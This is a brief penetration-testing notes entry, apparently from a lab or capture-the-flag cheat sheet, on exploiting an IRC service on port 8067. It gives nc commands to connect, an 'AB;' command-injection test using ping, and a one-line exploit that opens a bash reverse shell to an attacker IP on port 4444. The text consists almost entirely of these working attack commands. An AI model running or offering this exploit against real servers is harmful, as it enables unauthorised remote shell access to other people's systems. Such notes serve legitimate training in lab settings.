IRC - 8067
# Connecting IRC
nc 10.10.10.10 8067
PASS eren
NICK eren
USER eren anything :eren # check unreal version and research about it
# Checking if it is vulnerable
echo "AB; ping -c 1 10.10.14.4" | nc 10.10.10.117 8067
tcpdump -i tun0 icmp # in another tab
# Exaploitation and getting a shell
echo "AB; bash -c 'bash -i >& /dev/tcp/10.10.14.3/4444 0>&1'" | nc 10.10.10.117 8067
Last updated